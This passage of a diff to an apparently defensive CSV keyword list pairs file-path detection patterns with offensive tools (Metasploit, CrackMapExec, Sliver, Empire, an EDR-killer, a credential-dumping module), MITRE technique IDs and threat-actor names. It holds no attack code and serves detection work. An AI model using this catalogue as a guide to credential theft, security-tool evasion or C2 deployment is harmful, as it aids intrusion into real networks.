- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*/process_herpaderping/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/process_herpaderping/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/Process-Instrumentation-Syscall-Hook*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prometheus.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" -"*/protocols/ftp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/ldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/mssql.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/smb.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/ssh.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ftp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/mssql.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/smb.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ssh.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/proxy/Tor.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/proxy/tor_paths.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/Proxy_Def_File_Generator.cna*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 
- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/proxychains.git*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" -"*/proxymaybeshell*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/ps_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/ps1_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PS2EXE.git*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*/proxymaybeshell*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ps_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/ps1_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PS2EXE.git*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*/ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/PS2EXE/*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*/PS2EXE/*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*/ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary 
emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*/psexec.json*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/psnuffle*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/psexec.json*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/psnuffle*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PSpersist.git*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" -"*/pspy -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
